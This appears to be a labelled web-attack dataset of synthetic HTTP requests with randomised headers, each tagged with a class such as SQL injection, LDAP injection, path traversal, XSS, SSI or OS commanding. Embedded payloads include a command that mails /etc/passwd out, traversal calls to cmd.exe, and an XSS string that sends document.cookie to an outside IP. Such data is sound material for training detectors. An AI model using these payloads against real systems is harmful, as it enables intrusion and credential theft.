Pragma: eesmShbt='tpianNn'
Proxy-Authorization: s8m7 sweOt=darauoem
Authorization: aGkse 0eemciA=ntgneHa
Range: 1614-89,75-
Referer: http://www.4auc.com/indte0.bin
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.5 (X11; U; Linux i586 5.4; 1p-zM; rv:9.6.7) Gecko/71007544
UA-CPU: StrongARM
UA-Disp: 687,156,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 548x253
Via: FTP/5.2 www.tpeen.css:889, 3.0 www.7uoan.shtml
Transfer-Encoding: identity
Upgrade: slu/8.6, mse/3.9, 1dnh/0.1
Warning: 392 248.155.194.89 "olpeyotcyYya" "Sun, 14 Aug 05 03:35:30 UTC"
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 466621533909615
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

Doyhoewsae=331&all=llfcmdl&i82dl8o=stauX

End - Id: 45979
Start - Id: 36727
class: OsCommanding
GET /nrgNrKctd/Ihi/scriptlogM1linkr/KvarewR3FGjuy2C/le5zpra/hKZO54l-yxo8/hn/elstt9rn/a3titt2u/am/rysd18Et/HMHocL9CnZwgetJopenservicesj.png?tdwev=dFnOp&JuVd=13&hcvtsetsw=wheree&izmhyezNL=wandoi&jdgtnvogrb=aLlDtNNjXEv&Ifenuneawh3etyt=oops%3B++cat++++%2Fetc%2Fpasswd++%7C+++mail++++your%40aprnd.com&5s=Ee&etydhnenEe=oS8lf5arkcceueS&qe0ghcvuynatb=41&xqe2i1ztp6s=rUjZTppzp HTTP/1.1
Host: 120.6.180.115
Connection: keep-alive
Accept: audio/*;q=0.1, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 38.98.48.204
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="6"
Date: Fri, 19 Nov 04 22:31:34 CET
ETag: "hdxb06ek3SSITXtEz"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 18 Nov 06 16:31:32 CET
If-Unmodified-Since: Mon, 29 May 06 12:53:58 GMT
If-Match: "Q-SweOR6ExaN0vBgr3"
If-None-Match: *
If-Range: Wed, 04 Aug 04 03:54:34 CET
Max-Forwards: 241
MIME-Version: 6.4
Pragma: btudd8=afse
Proxy-Authorization: Basic bVhudGVvbDplU3Rtc3I=
Authorization: Digest response="18BBA6CC47843347fa6D8aeE033EC1Fd"
Range: 17833-,074264-927,-3
Referer: /eBeXe/CeUtj/6qsa.nsf
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: quans/4.3
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 656x0255
Via: FTP/1.9 www.a8n6pa.css:5012
Transfer-Encoding: compress
Warning: 356 121.238.97.82 "SynhtwQveostoh" "Sat, 03 Dec 05 18:43:40 CET"
X-Forwarded-For: 18.24.168.27
X-Serial-Number: 5966336
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36727
Start - Id: 43857
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tanrohutg.com
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.2
Accept-Language: rsmset-wewh
Cache-Control: max-age=771
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Wed, 16 Jun 04 02:42:12 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Wed, 12 May 04 03:05:51 UTC
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "UIYkBD9_9mEHf-a6k"
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: NTLM ZmhhaGZvbG9iZWloYWMwbXJ3dHNBb2dodHVBZUVyQzZkbmxy
Range: 064373-124259,214-265,801-679
Referer: /HWhiyrm/fduAah.jpeg
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: hVnfnen
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43857
Start - Id: 37234
class: LdapInjection
GET /aspitshn/4yopgpu.shtml?EnueeEopyE=repsshnPuA&Akt=57&g01Ks2.=81115430&u26doin=itiTDoi&ef=r0WH5EE&4xPOK0RnA=81omaiihttpsreplaceitote&Wrtxie=acdrop+y&raacfgoms=lmjttd+%7Ctd&0nlrord=nrm&execoAs=otrm&sEThgtriib=56100&fxm2ea3Eaveeasj=5109018&moaN=6aEQu-Bl5a&8tcngnedras=43%29%28%26%28objectClass%3Dpeds%29%28%7C%28sn+%3D++++qe%29%28cn%3Dbetn++J*%29%29 HTTP/1.1
Host: www.adAev3ae.st
Connection: keep-alive
Accept: image/png;q=0.5, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: aefjin-0li059, raezl-ee, aaenlyhe-lntuAP;q=0.4
Cache-Control: no-transform
Client-ip: 164.10.58.80
Cookie: frecxIml=$g 6;nyo=uls1n;ehoa ai ;fO=saTto>~\;tqgt8nAsdgrn=87;NWd=ehj/&;8IQw=umasT2tcr )h
Cookie2: $Version="79"
Date: Sat, 12 Sep 09 12:02:34 CET
ETag: "9s4VjvQcPLA.jPaknH8o"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 685
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: vghc tzcn=txlrsuw
Range: -035
Referer: http://hswitsr.org/8srd/lcwiait.swf
TE: trailers,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 2.6; iI-em; rv:9.7.8) Gecko/29958225
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0327x020
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37234
Start - Id: 46167
class: PathTransversal
GET /cTxsdeyTnobtweooohsV.shtml?da=nPEu6OsQ&pohoe1e=eFtattodc4i1%28admin&7ee=hZZoM.3XBnt&rinputHaH@k=11&rws4etr=eiumanejt2ele5lett&bvpuncih=2&r0anhtotr=binc&2s=ch7execwovjndnsdivirr%7E%2F&V5KKfPscriptA3oSi=nokO&eoss8teOd5s=%2Fetc%2Fpasswd HTTP/1.1
Host: 60.14.186.23
Connection: close
Accept: text/*, application/*;q=0.6, application/*;q=0.0
Accept-Charset: x-mac-turkish;q=0.5, windows-1257;q=0.2, iso-10646-ucs-2, isiri-3342, big5;q=0.5
Accept-Encoding: *
Accept-Language: dis-s;q=0.1
Cache-Control: max-age=575
Client-ip: 231.104.230.202
Cookie: anEseg=q etcdc/oselssnoas  iperll;Hio6tersw10e=083712;9heelem=tj6q
Cookie2: $Version="276"
Date: Sat, 23 Sep 06 01:45:29 CET
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: 100-continue
From: sccIhe@oyejc.it
If-Modified-Since: Mon, 26 Dec 05 05:24:26 UTC
If-Unmodified-Since: Sat, 13 Jan 07 24:59:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: slso ala9=euegghy
Authorization: Digest cnonce="edgsger"
Range: -51066
Referer: http://www.arrsb.st/uDces/htdp.tiff
TE: trailers,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: nrhDaQuj http://www.2ef6w.ch
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 6.9 63.96.226.125
Transfer-Encoding: compress
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46167
Start - Id: 38815
class: LdapInjection
GET /ttucoscrc0u/snsreoghht/jBrisahfdueT1aGmee0j/y-eyFjfj.css?w.scriptVmmZ2boot.iniR=efMo%29%28+%7C++%28huc%3D*%29&oteotned=zd3t&Jm8EK_=ih_fwi0B%40E HTTP/1.0
Host: 26.80.85.72
Connection: e4oSake
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: tLrsnoes=oAelbrig
Client-ip: 103.147.207.153
Cookie: sQ4qV_iRmhDM=307112;oikadouN='p%s
Cookie2: $Version="420"
Date: Mon, 10 Nov 08 11:20:38 UTC
ETag: W/"XO.R8JWcEWuUM9wv"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: "HLWZlC.Es18LxLYdIi-J"
If-None-Match: *
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 536
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: lrNcan sehde=9auTs3e
Range: 635-4999,578-28594,-3
Referer: http://www.aew5ien.gov/nuli/Rdoaqes/l6hjlebj/8OesNej.jsp
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 2.2; cE-ge; rv:1.1.1) Gecko/01568306
UA-CPU: 68000
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.4 181.37.175.127, rEi/4.5 www.n5aul4d7.js:293
Transfer-Encoding: gzip
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 488 www.sneni.css "slektgO" "Fri, 04 Jan 08 16:42:53 GMT"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38815
Start - Id: 42560
class: SqlInjection
GET /em54soshtrpolhhlU/khjmebarssAhR0s.js?6au9nrS=%27%3B+++insert+into+++++ejuE+++values%28666%2C%27oxod%27%2C%27rur9%27%2C0xfffff%29 HTTP/1.0
Host: 150.36.80.239
Connection: 3i1ns
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 29.213.12.81
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="79"
Date: Sat, 30 Apr 05 07:07:37 CET
ETag: "TraGuu_QjplOnZR"
Expect: swee
From: spods@kyeiscew.net
If-Modified-Since: Sat, 02 May 09 22:06:50 CET
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 149
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: NTLM Y2FuYXJuZkZuZTJlcmVoaW40WHV0ZVN0dHNzZGQzN3pP
Range: -9299
Referer: http://3mIru4A.net/eaee/lpart5/ntea/ransaq/blOe.avi
TE: gzip
Trailer: Expect
User-Agent: Mozilla/3.5 (compatible; Konqueror/8.2; Win98; ealoecotr)
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7147x605
Via: 3.3 62.32.90.167, 3.2 252.83.1.73
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42560
Start - Id: 37577
class: LdapInjection
PUT /iaxdaveucy/sawK8/.TBk0d_2mZ/n_Prg3GpqQO1h/B4uehINIHbn9.k./ew/Yv@U/uEbinWgroup byu.png? HTTP/1.1
Content-Length: 164
Content-Language: 5adetfI8,CasEdpat,0ho
Content-Encoding: gzip
Content-Location: /ceEs/lieea/onritgtP/rntq7.png
Content-MD5: YWZueWVvY3V0bmV0ZGVkYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Aug 04 15:53:27 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.sfitnEfEel.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.7
Accept-Language: 0ns-oii
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="2"
Date: Sun, 01 Feb 09 04:35:46 GMT
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Mon, 15 Nov 04 10:12:54 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: "IFFhuDtpmcs89Rgl"
Max-Forwards: 72
MIME-Version: 0.1
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 36-,-7
Referer: http://www.ievo.ch/eohbfre/poneghm/eteiM.dll
TE: trailers,deflate,chunked;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 5.3; x6-hr; rv:2.0.1) Gecko/93513396
UA-CPU: Sparc
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eHsrerf7gz=djkeQPg&1S_idBT=2jfhudJus9a&jfeegtat=e-JEmNjYGg&et6oigoSo9ezf8r=) (    |    (displayName=had*)   (name   =    had*)(  mail=had* )

End - Id: 37577
Start - Id: 47246
class: XSS
GET /eue6yoqlnxaow/b4zI9FRCm/4nWeadNQ4KGI4DGDP/OmJ9s_9Sd9i@gcJ/5NejW.mdb?idoltuOta=iet&oheec4meejbsaE=tqh3iqBF-0e&nset=%3Ce4i&9sd=6683590&tcu=%26%7B%5Bwindow.open%28%27http%3A%2F%2F219.178.225.90%2Fis.dll%27%2Bdocument.cookie%29%3B%5D%7D%3B&ehuideetunc7a=rol70woti&I_.-yJYjhttpsdivd=pS4I&htAEdcposoie=3606&nr=%2Beths4nriurW&sgmBsopugfnoasf=7&sdlgca=i9I&72WsPEbz-G=464216670 HTTP/1.1
Host: 51.55.52.219
Connection: keep-alive
Accept: application/*;q=0.3, image/*;q=0.0, video/*
Accept-Charset: iso-10646-ucs-2;q=0.8, windows-1258, iso-2022-kr;q=0.9, cp-950;q=0.4, x-mac-chinesetrad
Accept-Encoding: gzip, compress;q=0.6, gzip, gzip;q=0.2, gzip;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 19.118.218.108
Cookie: 2o2tmerAhO=914;al8U=dglam|home3dlfeO99
Cookie2: $Version="66"
Date: Sun, 20 Feb 05 11:52:55 UTC
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: 100-continue
From: eeTaCo@mVlE3nKhn.biz
If-Modified-Since: Sun, 25 Apr 04 17:39:28 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 5581
MIME-Version: 3.6
Pragma: hoy=ro
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: http://sacas.ch/icetNhq/6Er1miv/ODvo6lCa/rlhr0t/weaaw.mspx
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: b3Ethey/1.4
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/1.1 112.223.231.15, naia/7.1 209.9.53.118
Transfer-Encoding: 1Ohs; anmlaA=sctE
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 47.247.175.175
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47246
Start - Id: 40536
class: SSI
GET /lQPkzeNrGkzO2qWk9/rQ8ZJfW0f12WgNAu_1/epiEc8uhxg/tcd/eAD4UiMfnFG.asmx?xalu=oconnectbc3%7EaNv&2lqIp=Ebojsolmtrgthzett&wtsod2h=3111630&uqh=4499860&rnewi=06&wOreoiitdyLn7be=50&hasEviolRernede=+t&oofnnje=URcn2ihtS&rsrif2Eyaheno=%3C%21--+%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&cmw=tyk+ HTTP/1.1
Host: 218.236.50.110
Connection: keep-alive
Accept: text/xml, text/*
Accept-Charset: x-mac-ce;q=0.5, x-mac-chinesetrad
Accept-Encoding: identity, deflate;q=0.9, compress, deflate;q=0.0
Accept-Language: h-hae, opsgqute-rhslmsv7, n1org-abse, emmo-orms;q=0.2
Cache-Control: no-transform
Client-ip: 233.63.57.74
Cookie: zqb=c_IX;ichfmCdrcfX=aUbBq;Mh0tmp=mtla;1L35DDkS=tFU6n.N-QY;fkod5=%uaIoj;ktysDe5Oi=e(mia
Cookie2: $Version="326"
Date: Sun, 07 Sep 08 24:53:17 CET
ETag: "AfcdCSnakAcyeEBs"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Mon, 22 Nov 04 21:51:32 CET
If-Unmodified-Since: Mon, 19 Sep 05 14:08:46 CET
If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: *
Max-Forwards: 6065
MIME-Version: 7.8
Pragma: iar3d4st='Nkioue'
Proxy-Authorization: NTLM OGVMczFpMnRvRWdwYWJwZTZyam5hRXJ0U2xhdW5uSXFjaFRPYWU4bzU=
Authorization: gopleT 27c7o=rerz30S
Range: 5-15061,1-2
Referer: /9yu2nui/eNvl/tgtehn.mpg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.4 (compatible; Konqueror/5.7; SunOS sun4u; nyu6nea1; iRuialtpd)
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3418x3633
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: compress
Upgrade: ttRtgh/5.0, upo/8.3, 1a4/1.5, lamere/3.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40536
Start - Id: 42046
class: SqlInjection
GET /mBaMUuE_w9HjAc/ychU/@61QM@50m/t2zslng9iibt4etm1nx/iucoExuahne2i/mqbz-z/YCrPww_O7/tte5od/dCrVWlKoPEpax_j/vZNUzN-IGlP0zbl4iz/imxinA1lmi/rmf.cfm?Ars3hwn=lib0uuyw&eyehhic=t%40s%3BreL-haaC&PL6c=133250289&iesr=%27++++OR+++%27tvtq5su%27++++LIKE+++%27aze%2525&4likextTx=t5diom&echohjpassthruZhIW=e5i&brmphe=jZFtUTL4UhU7&emuuxeheeyt6y=45105447&aptncsehmioklo=siy47&2wytdolb=08&r7e=91 HTTP/1.1
Host: 89.135.32.70
Connection: 2kllninl
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 238.155.89.77
Cookie: cmdKIhomethdhjyeQ=5Ln
Cookie2: $Version="585"
Date: Thu, 17 Jan 08 14:34:21 UTC
ETag: W/"uOk-Ks6myYKrSBH2D"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Wed, 17 Sep 08 21:58:40 GMT
If-Unmodified-Since: Mon, 24 Nov 08 08:07:36 CET
If-Match: *
If-None-Match: *
If-Range: "GTjGF-FEDM86fcSk73vM"
Max-Forwards: 83
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dW9lNm90aGFheHNpdG9hYXd3ZXRFbm9mdDVpdXVkeWllYWVkbXg0aHpoQWw=
Range: -7
Referer: http://www.9E3ietn.com/anin/mpermslh/l49ia.rar
TE: deflate;q=0.5
Trailer: Accept
User-Agent: kieqix (aYo9qtAnP; e4pR7H; o7@-eC; eyocLn; 77eLY29o7g)
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 307x472
Via: 8.0 www.ipeLehc.htm, 0.7 25.139.239.228, FTP/5.2 www.o7Iroc.tiff
Transfer-Encoding: compress
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 001394948859071824
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42046
Start - Id: 44398
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 48.142.15.52
Connection: keep-alive
Accept: text/*, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: lEor-lthh, cs6-ott7
Cache-Control: ai=ahc5
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="1"
Date: Mon, 23 Feb 09 09:05:49 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Tue, 07 Nov 06 22:21:24 UTC
If-Unmodified-Since: Sat, 07 Mar 09 14:04:13 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: *
If-Range: Wed, 01 Dec 04 14:20:45 CET
Max-Forwards: 7241
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: rtrc iusenooo=galrlc
Range: 6-459,-64787
Referer: /5unawD/soaHat5/Upelinnc.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (Windows; U; Win98 2.5; 7r-1j; rv:4.3.1) Gecko/65364761
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 9.7 47.97.212.112:2955, 2.9 www.rda3n.shtml
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 354 118.238.114.197 "eyha0hehiihomqhzgiu0" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44398
Start - Id: 41711
class: SqlInjection
GET /oM98l7CoIvRc_@bL6T9/mwpyoSf2toinmoro8p5/hJM/dropSTzicP3E49IUGm/Enlo7whhC/TwUPRchFHA.a.v/a7ttEs/piftitogntik/hjGwpAra33RFI/u7WXSaqfosME/i-PPWRR.jsp?i4vaueasl=u&u8ra=lhmO&oya=htacces1&twpNTdherscwtsa=nf&RaDIISag8w=8&8tshiSeHt=901128519&CuAj=3738&4nlintbh5sdsVes=%27++++%2B+++%28+++++SELECT+++TOP+1++T2ivkge++FROM+++tthe%29++++%2B++++%27&wyw=4eelipBejXSTbn&WZpT@.sx=deEbr HTTP/1.1
Host: 163.22.200.43
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-2, iso-8859-1;q=0.4, hz-gb-2312, koi8;q=0.0, cp-936;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.192.139.19
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Wed, 09 Dec 09 06:54:59 UTC
ETag: "njdjAAshwzP.oyh3W"
Expect: 100-continue
From: oo2sso@fOothntR.fr
If-Modified-Since: Fri, 25 Feb 05 12:24:40 GMT
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: Sun, 29 Nov 09 07:39:29 GMT
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic TEFhazM0ZTpwdGU1ZWM=
Range: 864538-4,42725-309719
Referer: /9ne6if5i/pdwh4a7/ediigOn.swf
TE: chunked;q=0.7
Trailer: Via
User-Agent: dlevBsTpE3mat
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5958x694
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: tpunt/7.3, 4eDey/3.0
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41711
Start - Id: 39907
class: SSI
POST /eeaifouuinobrcgo6/8-U/8hVT8Na.K2TDMoxmJc3/ycsnasydhat4elTtAt/KThb/emu5tnalsenslna/t1tyRPd/allCj-dbuwgetIoGlocation/lotlisTwtg.htm? HTTP/1.0
Content-Length: 188
Content-Language: cse
Content-Encoding: compress
Content-Location: /neae/dcwfAto/boehou0/hguoswii/fk8rr.dll
Content-MD5: ZWVzb2VUbnFnc2x0ZXRlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 16:31:10 GMT
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: www.jn7mEstnsa.org
Connection: close
Accept: video/*;q=0.5, video/mpeg
Accept-Charset: iso-8859-7;q=0.8
Accept-Encoding: *
Accept-Language: snijt-anb;q=0.1, aisles-eiuarsm;q=0.3, mtooy46-4et, 7cm0esud-ki, g-TlmNl;q=0.6
Cache-Control: no-transform
Client-ip: 239.36.31.16
Cookie2: $Version="47"
Date: Wed, 05 Aug 09 09:07:38 UTC
ETag: "LcgSnpA@w-i3zxL9"
Expect: h0il
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 15 Jul 07 11:15:58 CET
If-None-Match: "yb.ZQRj9fcZzIenS7W"
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 984
Pragma: eolsfe='o8Ed'
Proxy-Authorization: NTLM aW9lbWNlZW5zcWVvaWcwbHExbWd5NXNvaXFyZWN5bjRhaQ==
Authorization: Digest cnonce="DmWeetx"
Referer: http://olt64ens.com/kscaR1e/YgsiXmn.swf
TE: trailers,deflate;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: ruibwud (a7ebla_D9; eX@t6Xc@)
Via: 9.0 www.1ra43hi.png, 6.8 www.Elrrz.html:87, 3.1 www.engoe.jpeg
Transfer-Encoding: gzip
